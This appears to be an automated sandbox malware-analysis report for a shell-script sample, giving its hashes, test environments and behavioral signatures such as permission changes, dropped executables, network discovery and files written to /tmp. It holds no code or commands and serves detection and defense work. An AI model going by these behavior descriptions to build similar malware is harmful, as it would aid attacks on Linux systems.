Analysis
-
max time kernel
11s -
max time network
128s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240729-en -
resource tags
arch:amd64 arch:i386 image:ubuntu1804-amd64-20240729-en kernel:4.15.0-213-generic locale:en-us os:ubuntu-18.04-amd64 system -
submitted
25/10/2024, 01:27
Static task
static1
Behavioral task
behavioral1
Sample
402e66b3e2faed23ffb7e204f5124182b7d88aefafaee1cabd25d2e1753ca7bb.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
402e66b3e2faed23ffb7e204f5124182b7d88aefafaee1cabd25d2e1753ca7bb.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
402e66b3e2faed23ffb7e204f5124182b7d88aefafaee1cabd25d2e1753ca7bb.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
402e66b3e2faed23ffb7e204f5124182b7d88aefafaee1cabd25d2e1753ca7bb.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
402e66b3e2faed23ffb7e204f5124182b7d88aefafaee1cabd25d2e1753ca7bb.sh
-
Size
10KB
-
MD5
1842c293913809baf3b70d2c7616a370
-
SHA1
cfb8715dfc9477769e6a4c913ce8cbf32a7c3c8a
-
SHA256
402e66b3e2faed23ffb7e204f5124182b7d88aefafaee1cabd25d2e1753ca7bb
-
SHA512
92c3faac1ab3b27d8d710a5629244e1de0b8ab965ed2978664b2406ff672998852b8986d72545fd5fca7e8d62f60bad51a06e90e9472642e8b22934f3ad80be5
-
SSDEEP
96:d6uPCaTjHLgukFYocSxdkV1aNhc0r0/gulc3/m6uPCalNPHXw8BbqSxdkV1PGNhv:JrgukGocSxdkV1x81u3BxdkV16
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
System Network Configuration Discovery 1 TTPs 10 IoCs
Adversaries may gather information about the network configuration of a system.
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97